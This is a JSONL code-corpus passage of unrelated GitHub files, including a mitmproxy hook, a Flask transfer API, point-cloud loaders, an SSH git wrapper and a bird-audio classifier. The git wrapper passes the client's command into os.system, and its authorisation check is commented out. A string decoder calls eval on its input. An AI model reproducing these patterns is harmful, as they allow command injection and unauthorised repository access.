\"dictator\", \"massacre\", \"oppressed\", \"loot\", \"looted\", \"pillage\", \"pillaged\", \"regime\", \"genocide\", \"horror\", \"horrors\", \"oppressor\", \"oppressors\", \"occupy\", \"occupation\", \"cruel\",\n]\n\nPOSITIVE_ADJ = [\n \"good\",\n \"lovely\",\n \"excellent\",\n \"fortunate\",\n \"pleasant\",\n \"delightful\",\n \"perfect\",\n \"happy\",\n]\nNEGATIVE_ADJ = [\n \"bad\",\n \"horrible\",\n \"poor\",\n \"unfortunate\",\n \"unpleasant\",\n \"disgusting\",\n \"evil\",\n \"unhappy\",\n]\n\n\ndef twitter_seeds():\n return POSITIVE_TWEET, NEGATIVE_TWEET\n\n\ndef finance_seeds():\n return POSITIVE_FINANCE, NEGATIVE_FINANCE\n\n\ndef turney_seeds():\n return POSITIVE_TURNEY, NEGATIVE_TURNEY\n\n\ndef adj_seeds():\n return POSITIVE_ADJ, NEGATIVE_ADJ\n\n\ndef hist_seeds():\n return POSITIVE_HIST, NEGATIVE_HIST\n\ndef gender_seeds():\n return MALE, FEMALE\n\ndef random_seeds(words, lexicon, num):\n sample_set = list(set(words).intersection(lexicon))\n seeds = random.sample(sample_set, num)\n return [s for s in seeds if lexicon[s] == 1], [s for s in seeds if lexicon[s] == -1]\n","repo_name":"coraxolotl/MTH3401-src","sub_path":"SocialSent2/SocialSent2/socialsent/seeds.py","file_name":"seeds.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22110100902","text":"\"\"\"\n INTERVAL: MERGE WITH SORTED INTERVALS (EPI 14.5: MERGING INTERVALS)\n\n Write a function which takes an interval to be added and a list of disjoint closed intervals with integer endpoints\n (sorted by left endpoint), then computes and returns the union of the intervals in the list and the added interval\n sorted by left endpoint).\n\n Example:\n Input = ([1,8], [[-4, -1], [0, 2], [3, 6], [7, 9], [11, 12], [14, 17]])\n Output = [[-4, -1], [0, 9], [11, 12], [14, 17]]\n\n REMEMBER: '(', ')' is open (up to, not including), '[', ']' is closed (up to, including).\n\"\"\"\n\n\n# Questions you should ask the interviewer (if not explicitly stated):\n# - What time/space complexity are you looking for?\n# - What are the possible list lengths (empty)?\n# - Will each interval be correctly formatted (have a start and and end, start < end)?\n# - Are the interval endpoints open or closed?\n\n\n# APPROACH: Brute Force (NOT IMPLEMENTED)\n#\n# Form a set with all the list intervals and the new interval. Find the smallest start and the largest end point from\n# the set, then create the result list from testing each integer in the range from the smallest to the largest for\n# membership in the set.\n#\n# Time Complexity: O(d * n), where d is the difference between the two extreme values, and n is the (new) set size.\n# Space Complexity: O(r), where r is the length of the result list.\n\n\n# Approach: Improved\n#\n# This approach improves on the brute force approach (above) and does not check ALL integers in the range of lowest to\n# highest interval, only the integers in the combined set of intervals endpoints.\n#\n# The process is:\n# (1) Add each interval that (starts and) ends BEFORE the added (new) interval to the result.\n# (2) Once at the interval that intersects with the added (new) interval, compute the union, iterating through\n# subsequent intervals (if they intersect with the added interval), and add (the union interval) to result.\n# (3) Iterate through remaining intervals, adding them to result.\n#\n# Time Complexity: O(n), where n is the length of the list.\n# Space Complexity: O(r), where r is the length of the result list.\ndef merge_with_sorted_intervals(new_interval, intervals_list):\n if intervals_list is not None and new_interval is not None:\n result = []\n i = 0\n while i < len(intervals_list) and intervals_list[i][1] < new_interval[0]:\n result.append(intervals_list[i])\n i += 1\n merged_interval = None\n while i < len(intervals_list) and intervals_list[i][0] <= new_interval[1]:\n merged_interval = [min(new_interval[0], intervals_list[i][0]), max(new_interval[1], intervals_list[i][1])]\n i += 1\n result.append(merged_interval)\n result += intervals_list[i:]\n return result\n\n\nargs = [([1, 8], [[-4, -1], [0, 2], [3, 6], [7, 9], [11, 12], [14, 17]]),\n ([2, 6], [[1, 3], [8, 10], [15, 18]]),\n ([1, 4], [[4, 5]])]\nfns = [merge_with_sorted_intervals]\n\nfor new_interval, interval_list in args:\n print(f\"new_interval: {new_interval}\\ninterval_list: {interval_list}\")\n for fn in fns:\n print(f\"{fn.__name__}(new_interval, intervals_list): {fn(new_interval, interval_list)}\")\n print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/sort_and_search/interval_merge_with_sorted_intervals.py","file_name":"interval_merge_with_sorted_intervals.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36258408601","text":"import os\nimport codecs\nimport subprocess\nimport platform\n\nfrom pseudo import compile, __version__\nfrom pseudo.cli import pdc\nfrom pseudo.type import Int, Statement, EOL\n\n\ndef test_compile():\n if compile(\"pisz 4\") != [Statement(\"pisz\", args=Int(4)), EOL()]:\n print(compile(\"pisz 4\"))\n raise AssertionError\n\n\nscript = \"\"\"\na := 1\njeżeli a=1 to\n T[a] := a\n pisz a\n\ndopóki a < 2 wykonuj\n T[a] := a\n a:=a+1\npisz \"2\"\n\ndla i:=3,...,5 wykonuj\n dla x:=3,...,5 wykonuj\n T[x] <- x\n pisz x\n\nkoniec\n\"\"\"\n\n\ndef test_main():\n with codecs.open(\"t1.pdc\", encoding=\"utf-8\", mode=\"w\") as fp:\n fp.write(script)\n cmd = \"python3 pdc.py t1.pdc\"\n if platform.system() == \"Windows\":\n cmd = cmd.replace(\"3\", \"\")\n if subprocess.getoutput(cmd) != \"12345345345\":\n print(cmd)\n print(subprocess.getoutput(cmd))\n raise AssertionError\n os.remove(\"t1.pdc\")\n\n cmd = \"python3 pdc.py -v\"\n if platform.system() == \"Windows\":\n cmd = cmd.replace(\"3\", \"\")\n if subprocess.getoutput(cmd) != __version__:\n print(cmd)\n print(subprocess.getoutput(cmd))\n raise AssertionError\n\n cmd = [\"python3\", \"pdc.py\"]\n if platform.system() == \"Windows\":\n cmd[0] = cmd[0].replace(\"3\", \"\")\n if subprocess.run(cmd).returncode == 0:\n print(cmd)\n print(subprocess.run(cmd).returncode)\n raise AssertionError\n","repo_name":"pniedzwiedzinski/pseudo","sub_path":"tests/pseudo_test.py","file_name":"pseudo_test.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"17087626105","text":"class Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n n = len(words)\n d = {}\n for i, x in enumerate(order):\n d[x] = i\n \n for i in range(n-1):\n for j in range(len(words[i])):\n if j>=len(words[i+1]):\n return False\n \n if words[i][j] != words[i+1][j]:\n if d[words[i][j]] > d[words[i+1][j]]:\n return False\n break\n return True","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"0953-verifying-an-alien-dictionary/0953-verifying-an-alien-dictionary.py","file_name":"0953-verifying-an-alien-dictionary.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25146228577","text":"import csv\nimport json\n\ndef response(flow):\n # 通过打印判断出是否是需求的内容或者是检查请求的response查看年请求到的内容\n # 如果打印,会出现让人承载不下的结果导致无法确定目标url或者按键q退出,检查请求\n url = 'https://gw.csdn.net/cms-app/v1/blog_details/may_login/get_article_details_info_html?from=home&bloggerUserName=qq_43431158'\n if flow.request.url.startswith(url):\n text = flow.response.text\n print(text)\n","repo_name":"somebady111/mitmproxy_csdn","sub_path":"parse_csdn_article_detail.py","file_name":"parse_csdn_article_detail.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22871954467","text":"import numpy as np\nimport os\nfrom plyfile import PlyData, PlyElement\nimport torch\n#from multiprocessing.dummy import Pool as ThreadPool \n\nimport transforms3d.euler as euler\nfrom os import mkdir\nfrom os.path import join, exists\n\n\n\nSCALE = 1\n\ndef get_ply_fn_lst(folder_lst):\n ply_fn_lst =[]\n for folder in folder_lst:\n name_lst = os.listdir(folder)\n for name in name_lst:\n if(\".ply\" in name):\n fn=folder + \"/\"+name\n ply_fn_lst+=[fn]\n return ply_fn_lst\n\n\n\n#pc p_num*3 np\ndef get_augmented_pc(pc):\n size= pc.shape[0]\n new_pc = pc\n \n axis = np.random.rand(3)\n axis = axis / np.sqrt(pow(axis,2).sum()) \n \n theta= (np.random.rand()-0.5)*np.pi*2\n \n Rorgmat = euler.axangle2mat(axis,theta)\n R = Rorgmat.reshape((1,3,3)).repeat(size,0) \n Torg = (np.random.rand(1,3,1)-0.5)*0.2 #-10cm to 10cm \n T=Torg.repeat(size,0)\n \n new_pc = np.matmul(R, new_pc.reshape((size,3,1))) +T\n \n return new_pc.reshape((size,3))\n\ndef get_augmented_pc_ret(pc):\n size= pc.shape[0]\n new_pc = pc\n\n axis = np.random.rand(3)\n axis = axis / np.sqrt(pow(axis,2).sum())\n \n theta= (np.random.rand()-0.5)*np.pi*2\n \n Rorgmat = euler.axangle2mat(axis,theta)\n R = Rorgmat.reshape((1,3,3)).repeat(size,0)\n Torg = (np.random.rand(1,3,1)-0.5)*0.2 #-10cm to 10cm\n T=Torg.repeat(size,0)\n \n new_pc = np.matmul(R, new_pc.reshape((size,3,1))) +T\n \n return new_pc.reshape((size,3)), Rorgmat, Torg[...,0]\n\n\n##return batch*p_num*3 torch\ndef get_random_pc_batch_from_ply_fn_lst_torch(ply_fn_lst , batch, augmented=False):\n \n ply_fn_batch = []\n \n for b in range(batch):\n index = np.random.randint(0, len(ply_fn_lst))\n ply_fn_batch+=[ply_fn_lst[index]]\n \n pc_batch=[]\n for ply_fn in ply_fn_batch:\n pc = get_pc_from_ply_fn(ply_fn)\n if(augmented==True):\n pc = get_augmented_pc(pc)\n pc_batch +=[pc]\n \n pc_batch_torch = torch.FloatTensor(pc_batch).cuda()\n \n return pc_batch_torch\n\n#num*p_num*3 numpy\ndef get_all_pcs_from_ply_fn_lst_np(ply_fn_lst):\n pc_lst=[]\n n=0\n for ply_fn in ply_fn_lst:\n pc = get_pc_from_ply_fn(ply_fn)\n pc_lst +=[pc]\n if(n%100==0):\n print (n)\n n=n+1\n print (\"load\", n, \"pcs\")\n \n return pc_lst\n\n\n##return batch*p_num*3 torch # batch*p_num*3 torch\ndef get_random_pc_batch_from_pc_lst_torch(pc_lst , neighbor_lst, neighbor_num_lst, batch, augmented=False):\n \n #pc_colors_batch = []\n weights_batch=[]\n pc_batch = []\n for b in range(batch):\n index = np.random.randint(0, len(pc_lst))\n pc_weights = pc_lst[index]\n pc = pc_weights[:,0:3]\n weights = pc_weights[:,3]\n #colors = pc_weights[:,3:6]\n\n if(augmented==True):\n pc=get_augmented_pc(pc)\n pc_batch +=[pc]\n #pc_colors = np.concatenate((pc, colors),1)\n #pc_colors_batch+=[pc_colors]\n weights_batch+=[weights]\n #pc_colors_batch = np.array(pc_colors_batch)\n weights_batch = np.array(weights_batch)\n #smoothed_pc_batch = get_smoothed_pc_batch_iter(pc_batch,neighbor_lst, neighbor_num_lst)\n \n weights_batch_torch = torch.FloatTensor(weights_batch).cuda()\n #pc_colors_batch_torch = torch.FloatTensor(pc_colors_batch).cuda()\n pc_batch_torch = torch.FloatTensor(pc_batch).cuda()\n\n #smoothed_pc_batch_torch = torch.FloatTensor(smoothed_pc_batch).cuda()\n return pc_batch_torch , weights_batch_torch #, smoothed_pc_batch_torch\n\n\n##return batch*p_num*3 torch # batch*p_num*3 torch\ndef get_indexed_pc_from_pc_lst_torch(pc_lst , index, augmented=False):\n \n pc_weights = pc_lst[index]\n pc = pc_weights[:,0:3]\n weights = pc_weights[:,3]\n \n if(augmented==True):\n pc=get_augmented_pc(pc)\n\n weights_torch = torch.from_numpy(weights).float()\n pc_torch = torch.from_numpy(pc).float()\n \n return pc_torch , weights_torch #, smoothed_pc_batch_torch\n\n#point_num*3\ndef compute_and_save_ply_mean(folder_lst, pc_fn):\n ply_fn_lst=get_ply_fn_lst(folder_lst)\n pc_batch = []\n for ply_fn in ply_fn_lst:\n pc = get_pc_from_ply_fn(ply_fn)\n pc_batch +=[pc]\n pc_batch = np.array(pc_batch)\n pc_mean = pc_batch.mean(0)\n pc_std = pc_batch.std(0)\n np.save(pc_fn+\"mean\", pc_mean)\n np.save(pc_fn+\"std\", pc_std)\n return pc_mean ,pc_std\n \n \n \n \n\n#pc p_num np*3\n#template_ply Plydata\ndef save_pc_into_ply(template_ply, pc, fn):\n plydata=template_ply\n #pc = pc.copy()*pc_std + pc_mean\n plydata['vertex']['x']=pc[:,0]\n plydata['vertex']['y']=pc[:,1]\n plydata['vertex']['z']=pc[:,2]\n plydata.write(fn)\n \n#pc p_num np*3\n#color p_num np*3 (0-255)\n#template_ply Plydata\ndef save_pc_with_color_into_ply(template_ply, pc, color, fn):\n plydata=template_ply\n #pc = pc.copy()*pc_std + pc_mean\n plydata['vertex']['x']=pc[:,0]\n plydata['vertex']['y']=pc[:,1]\n plydata['vertex']['z']=pc[:,2]\n \n plydata['vertex']['red']=color[:,0]\n plydata['vertex']['green']=color[:,1]\n plydata['vertex']['blue']=color[:,2]\n \n plydata.write(fn)\n plydata['vertex']['red']=plydata['vertex']['red']*0+0.7\n plydata['vertex']['green']=plydata['vertex']['red']*0+0.7\n plydata['vertex']['blue']=plydata['vertex']['red']*0+0.7\n \n \ndef get_smoothed_pc_batch_iter(pc, neighbor_lst,neighbor_num_lst, iteration=10):\n smoothed_pc = get_smoothed_pc_batch(pc,neighbor_lst,neighbor_num_lst)\n for i in range(iteration):\n smoothed_pc = get_smoothed_pc_batch(smoothed_pc,neighbor_lst,neighbor_num_lst)\n return smoothed_pc\n\n#pc batch*point_num*3\n#neibhor_lst point_num*max_neighbor_num\n#neibhor_num_lst point_num\ndef get_smoothed_pc_batch(pc, neighbor_lst, neighbor_num_lst):\n batch = pc.shape[0]\n point_num = pc.shape[1]\n pc_padded = np.concatenate((pc, np.zeros((batch, 1,3))),1) #batch*(point_num+1)*1\n smoothed_pc = pc.copy()\n for n in range(1,neighbor_lst.shape[1]):\n smoothed_pc += pc_padded[:,neighbor_lst[:,n]]\n \n smoothed_pc =smoothed_pc / neighbor_num_lst.reshape((1,point_num,1)).repeat(batch,0).repeat(3, 2)\n \n return smoothed_pc\n\ndef get_smoothed_pc_iter(pc, neighbor_lst,neighbor_num_lst, iteration=10):\n smoothed_pc = get_smoothed_pc(pc,neighbor_lst,neighbor_num_lst)\n for i in range(iteration):\n smoothed_pc = get_smoothed_pc(smoothed_pc,neighbor_lst,neighbor_num_lst)\n return smoothed_pc\n\n\n#pc point_num*3\n#neibhor_lst point_num*max_neighbor_num\n#neibhor_num_lst point_num\ndef get_smoothed_pc(pc, neighbor_lst, neighbor_num_lst):\n point_num =pc.shape[0]\n pc_padded = np.concatenate((pc, np.zeros((1,3))),0) #batch*(point_num+1)*1\n smoothed_pc = pc.copy()\n for n in range(1,neighbor_lst.shape[1]):\n smoothed_pc += pc_padded[neighbor_lst[:,n]]\n\n smoothed_pc =smoothed_pc / neighbor_num_lst.reshape(point_num,1).repeat(3,1)\n \n return smoothed_pc\n\n\ndef transform_plys_to_npy(ply_folder, npy_fn):\n pcs = []\n name_lst = os.listdir(ply_folder)\n n=0\n for name in name_lst:\n if(\".ply\" in name):\n if(n%100==0):\n print (n)\n fn = ply_folder+\"/\"+name\n pc = get_pc_from_ply_fn(fn)\n pcs+=[pc]\n n+=1\n \n pcs = np.array(pcs)\n \n np.save(npy_fn, pcs)\n \n \ndef get_pcs_from_ply_folder(ply_folder):\n pcs = []\n name_lst = os.listdir(ply_folder)\n n=0\n for name in name_lst:\n if(\".ply\" in name):\n if(n%100==0):\n print (n)\n fn = ply_folder+\"/\"+name\n pc = get_pc_from_ply_fn(fn)\n pcs+=[pc]\n n+=1\n \n pcs = np.array(pcs)\n \n return pcs\n\n","repo_name":"facebookresearch/VCMeshConv","sub_path":"GraphAutoEncoder/graphAE_dataloader.py","file_name":"graphAE_dataloader.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":94,"dataset":"github-code","pt":"37"} +{"seq_id":"4623059098","text":"def cons_box(box, w, h):\n \"\"\"Check and make sure the box is not exceeding the boundary.\n Args:\n box: Box (Left, Top, Right, Bottom) location list.\n w: The width of the image which the box lives on.\n h: The height of the image which the box lives on.\n Returns:\n The constrained box (Left, Top, Right, Bottom) location list.\n \"\"\"\n box[0] = max(0, box[0])\n box[1] = max(0, box[1])\n box[2] = min(w, box[2])\n box[3] = min(h, box[3])\n return box\n \ndef bounding_box_rec2square(img, box, scale=1):\n # In case the box is out of image\n box = cons_box(box, img.shape[1], img.shape[0])\n big_box = []\n \n # \n width = abs(box[0]-box[2])\n height = abs(box[1]-box[3])\n center = (int(box[0]+width/2), int(box[1]+height/2))\n square_len = int((width+height)/2)\n \n big_box.append(center[0] - scale*square_len//2)\n big_box.append(center[1] - scale*square_len//2)\n big_box.append(center[0] + scale*square_len//2)\n big_box.append(center[1] + scale*square_len//2)\n \n big_box = cons_box(big_box, img.shape[1], img.shape[0])\n return big_box\n\n","repo_name":"miracleyoo/mlib","sub_path":"cv/face/bounding_box.py","file_name":"bounding_box.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"30424672913","text":"from flask import Flask, request, jsonify\nfrom accounts_manager import *\n\napp = Flask(__name__)\n\nac = AccountManager()\n\n\n@app.route('/api/transfer/', methods=['GET', 'POST'])\ndef add_message():\n from_id = request.json['fromAccountId']\n to_id = request.json['toAccountId']\n amount = paisa_to_ruppes(request.json['amount'])\n\n if not check_transfer_validty(to_id, from_id):\n return jsonify(ERRORS_CODES[ERROR_FOR_SAME_ACCOUNT_ID])\n\n if request.json['account_type']:\n output = ac.transfer_amount(from_id, to_id, amount, request.json['account_type'])\n else:\n output = ac.transfer_amount(from_id, to_id, amount)\n\n return jsonify(output)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n return jsonify({\"app\": \"running on localhost\"})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"tarun-jethwani/BankingAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24185096796","text":"import unittest\nfrom workload_analyzer.WorkloadAnalyzer import *\n\n\nclass TestWorkloadAnalyzer(unittest.TestCase):\n def test_GetTestMetadata(self):\n test_start_time, config_file = GetTestMetadata(\n test_metadata_file=\"tests/test_data/test_metadata.out\"\n )\n self.assertEqual(\n [test_start_time, config_file], [1610944442298, \"test_data_run_config.json\"]\n )\n\n def test_ConstructConfigDataframe(self):\n [test_name, config_df] = ConstructConfigDataframe(\n \"tests/test_data/test_data_run_config.json\"\n )\n print(config_df)\n self.assertEqual(\n [test_name, set(config_df[\"application\"].unique())],\n [\"test_data_run\", {\"primes-python\"}],\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"PrincetonUniversity/faas-profiler","sub_path":"tests/unit_tests/WorkloadAnalyzer_test.py","file_name":"WorkloadAnalyzer_test.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"37"} +{"seq_id":"19675774547","text":"#!/usr/bin/env python\n\n### To use this file add lines in .ssh/authorized_keys like the following:\n### command=\"/usr/bin/python /path/to/gaas/git_server.py --user=heynemann --conf /path/to/gaas/gaas.conf\",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-rsa \n\nimport sys\nimport os\nfrom os.path import abspath\nimport argparse\n\nfrom gaas.config import Config\n\n\ndef parse_arguments(arguments):\n parser = argparse.ArgumentParser(description='git_server.py is a server for ssh git repos.')\n\n parser.add_argument('-u', '--user', help='User identified by the given ssh key.')\n parser.add_argument('-c', '--config', help='Configuration file path.')\n\n args = parser.parse_args(arguments)\n\n config_path = abspath(args.config)\n\n return {\n 'user': args.user,\n 'config_path': config_path\n }\n\ndef main(arguments):\n options = parse_arguments(arguments)\n user = options['user']\n config_path = options['config_path']\n\n config = Config.load(config_path)\n\n command = os.environ['SSH_ORIGINAL_COMMAND']\n\n userMap = {'username': ['reponame', 'reponame2'],\n 'username2': ['reponame2', 'reponame3']}\n if user and command:\n command_parts = command.split()\n\n if command_parts[0] in ['git-receive-pack', 'git-upload-pack']:\n #if command.split()[1] in [\"'/path/to/repositories/\" + r + \".git'\" for r in userMap[user]]:\n new_command = \"%s '%s/%s'\" % (command_parts[0], config.GIT_ROOT.rstrip('/'), command_parts[1].strip(\"'\").lstrip('/'))\n os.system('exec git-shell -c \"' + new_command + '\"')\n #else:\n #sys.stderr.write(\"You can't access this repository.\")\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"heynemann/gaas","sub_path":"gaas/git_server.py","file_name":"git_server.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38439971769","text":"#!/usr/bin/python3\ndef decodeStrings(s):\n \"\"\" Sorts letters in string s\n by the order they occur in string t\n Keyword arguments:\n s: string to sort\n t: string which letters sort string s\n \"\"\"\n list_s = list(s)\n for idx, letter in enumerate(list_s):\n if letter == '[':\n list_s[idx] = '*('\n elif letter == ']':\n list_s[idx] = ')'\n elif letter.isdigit():\n list_s[idx] = '+' + letter\n elif letter != '[' and letter != '*(' and letter != ')':\n list_s[idx] = '\"{}\"'.format(letter)\n decoded = ''.join(list_s)\n return eval(decoded)\n","repo_name":"kevanlucc/spotify_challenge","sub_path":"decodeStrings.py","file_name":"decodeStrings.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26701669969","text":"from django.urls import path\nfrom src.apps.courses.api.v1.views import CourseListView, CourseDetailView, CourseCreateView, CategoryListView, \\\n CourseLessonsView, LessonVideoListView, VideoSingleView, CourseListByCategoryView\n\nurlpatterns = [\n path('list/', CourseListView.as_view(), name='course-list'),\n path('list/category//', CourseListByCategoryView.as_view(), name='course-list-by-category'),\n path('/', CourseDetailView.as_view(), name='course-detail'),\n path('create/', CourseCreateView.as_view(), name='course-create'),\n # path('/update/', CourceUpdateView.as_view(), name='course-update'),\n # path('/delete/', CourceDeleteView.as_view(), name='course-delete'),\n path('categories/', CategoryListView.as_view(), name='category-list'),\n # path('category/create/', CategoryCreateView.as_view(), name='category-create'),\n # path('category//update/', CategoryUpdateView.as_view(), name='category-update'),\n # path('category//delete/', CategoryDeleteView.as_view(), name='category-delete'),\n path('/lessons/', CourseLessonsView.as_view(), name='lesson-list'),\n # path('lesson//', CourseLessonsView.as_view(), name='lesson-detail'),\n # path('lesson/create/', LessonCreateView.as_view(), name='lesson-create'),\n # path('lesson//update/', LessonUpdateView.as_view(), name='lesson-update'),\n # path('lesson//delete/', LessonDeleteView.as_view(), name='lesson-delete'),\n path('lesson//', LessonVideoListView.as_view(), name='video-list'),\n path('//', VideoSingleView.as_view(), name='video-detail'),\n # path('lesson/video/create/', VideoCreateView.as_view(), name='video-create'),\n # path('lesson/video//update/', VideoUpdateView.as_view(), name='video-update'),\n # path('lesson/video//delete/', VideoDeleteView.as_view(), name='video-delete'),\n]","repo_name":"tim646/ayoluchun.uz","sub_path":"src/apps/courses/api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17896070481","text":"# -*- coding: utf-8 -*-\nimport pykintone\nfrom pykintone import model\nimport pykintone.structure_field as sf\n\n\nclass BusinessCard(model.kintoneModel):\n\n def __init__(self, app, name, company, location, impression, submitter, image_path):\n super(BusinessCard, self).__init__()\n self.name = name\n self.company = company\n self.location = location\n self.impression = impression\n self.submitter = submitter\n self.image = [sf.File.upload(image_path, app)]\n\n\ndef create_card(comment, entities, file_path, submitter, conf_path):\n app = pykintone.load(conf_path).app()\n\n name, company, location = entities['PERSON'], entities['ORGANIZATION'], entities['LOCATION']\n card = BusinessCard(app, name, company, location, comment, submitter, file_path)\n result = app.create(card)\n\n if result.ok:\n return result\n else:\n print(result.error)\n","repo_name":"Hironsan/kintone-handson","sub_path":"plugins/apis/kintone.py","file_name":"kintone.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"2632335452","text":"import os\nimport datetime\nimport pandas as pd\nimport numpy as np\nimport soundfile as sf\n\nimport tensorflow as tf\nimport tensorflow_io as tfio\nfrom matplotlib import pyplot as plt\nimport keras.models\nfrom keras.utils import to_categorical\nfrom keras import Model\nfrom keras.layers import Flatten, Dense, Dropout, GaussianNoise, Input, BatchNormalizationV1\nfrom keras import regularizers\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications import ResNet50V2\nfrom sklearn.preprocessing import LabelEncoder\n\nimport tensorflowjs as tfjs\n\n# Loads in audio file and return wav data\ndef load_audio(file_path):\n audio_data, sample_rate = sf.read(file_path.numpy())\n return audio_data\n\n\n# Takes in a file and returns a processed (224, 224, 3) spectrogram\ndef preprocess(file_path, training):\n [wav, ] = tf.py_function(load_audio, [file_path], [tf.float32])\n wav = wav[:960000]\n zero_padding = tf.zeros([960000] - tf.shape(wav), dtype=tf.float32)\n wav = tf.concat([zero_padding, wav], 0)\n\n spectrogram = tfio.audio.spectrogram(\n wav, nfft=2048, window=2048, stride=int(960000/224) + 1)\n\n mel_spectrogram = tfio.audio.melscale(\n spectrogram, rate=32000, mels=224, fmin=500, fmax=13000)\n\n dbscale_mel_spectrogram = tfio.audio.dbscale(\n mel_spectrogram, top_db=80)\n\n if training:\n freq_mask = tfio.audio.freq_mask(dbscale_mel_spectrogram, param=5)\n time_mask = tfio.audio.time_mask(freq_mask, param=5)\n time_mask = tf.expand_dims(time_mask, axis=2)\n time_mask = tf.repeat(time_mask, repeats=3, axis=2)\n noise = tf.random.normal(shape=tf.shape(time_mask), mean=0.0, stddev=.2, dtype=tf.float32)\n output = time_mask + noise\n output = tf.divide(\n tf.add(tf.subtract(\n output,\n tf.reduce_min(output)\n ), tf.keras.backend.epsilon()),\n tf.maximum(tf.subtract(\n tf.reduce_max(output),\n tf.reduce_min(output)\n ), tf.keras.backend.epsilon() * 2),\n )\n return output\n else:\n dbscale_mel_spectrogram = tf.expand_dims(dbscale_mel_spectrogram, axis=2)\n dbscale_mel_spectrogram = tf.repeat(dbscale_mel_spectrogram, repeats=3, axis=2)\n dbscale_mel_spectrogram = tf.divide(\n tf.add(tf.subtract(\n dbscale_mel_spectrogram,\n tf.reduce_min(dbscale_mel_spectrogram)\n ), tf.keras.backend.epsilon()),\n tf.maximum(tf.subtract(\n tf.reduce_max(dbscale_mel_spectrogram),\n tf.reduce_min(dbscale_mel_spectrogram)\n ), tf.keras.backend.epsilon() * 2),\n )\n return dbscale_mel_spectrogram\n\n\n# Takes in a file path and returns the spectrogram and label\ndef process_training_images(file_path, label):\n spectrogram = preprocess(file_path, True)\n return spectrogram, label\n\n\ndef process_non_training_images(file_path, label):\n spectrogram = preprocess(file_path, False)\n return spectrogram, label\n\n\n# Takes in an optional cutoff point and returns the dataset, number of labels, and csv dataframe\ndef load_data(cutoff):\n global label_encoder\n cols = [\"filename\", \"primary_label\", \"secondary_labels\", \"common_name\"]\n df = pd.read_csv(\"./Data/train_metadata.csv\", usecols=cols)\n if cutoff is not None:\n df = df.loc[df['primary_label'] <= cutoff]\n #counts = df['primary_label'].value_counts()\n #df = df[~df['primary_label'].isin(counts[counts < 50].index)] # Removes birds that have less than 50 calls from df\n untouched_df = df.copy()\n df['file_path'] = df.apply(lambda row: \"./Data/Audio/\" + row.primary_label + \"/\" + row.filename, axis=1)\n images = df[\"file_path\"]\n\n labels = df.pop('common_name')\n labels = to_categorical(label_encoder.fit_transform(labels))\n\n output = tf.data.Dataset.from_tensor_slices((images, labels))\n return output, labels.shape[1], untouched_df\n\n\n# Takes in data and a batch size, prepares the data for training, and returns\ndef setup_training_data(data, batch_size):\n autotune = tf.data.experimental.AUTOTUNE\n\n data = data.map(process_training_images, num_parallel_calls=autotune)\n data = data.shuffle(buffer_size=50000, seed=0)\n data = data.batch(batch_size)\n data = data.prefetch(autotune)\n return data\n\n\ndef setup_non_training_data(data, batch_size):\n autotune = tf.data.experimental.AUTOTUNE\n\n data = data.map(process_non_training_images, num_parallel_calls=autotune)\n data = data.shuffle(buffer_size=50000, seed=0)\n data = data.batch(batch_size)\n data = data.prefetch(autotune)\n return data\n\n\n# Creates a new model using VGG16 cnn architecture with transfer learning\ndef create_model(num_labels):\n input_layer = Input(shape=(224, 224, 3))\n cnn = keras.applications.ResNet50V2(input_tensor=input_layer, weights='imagenet', include_top=False)\n\n for layer in cnn.layers:\n layer.trainable = False\n\n x = Flatten()(cnn.output)\n output = Dense(units=num_labels, activation='softmax')(x)\n\n model = Model([input_layer], [output])\n optimizer = keras.optimizers.Adam(learning_rate=0.0001)\n model.compile(optimizer=optimizer, loss='categorical_crossentropy',\n metrics=[keras.metrics.CategoricalAccuracy(), keras.metrics.Recall(), keras.metrics.Precision()])\n return model\n\n\n# Trains the model on given data\ndef train_model(training_model, training_data, validation_data, num_labels, epoch_amt, save):\n if training_model is None:\n training_model = create_model(num_labels)\n\n training_model.summary()\n\n log_dir = \"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n checkpoint = keras.callbacks.ModelCheckpoint(filepath=\"best_model\",\n 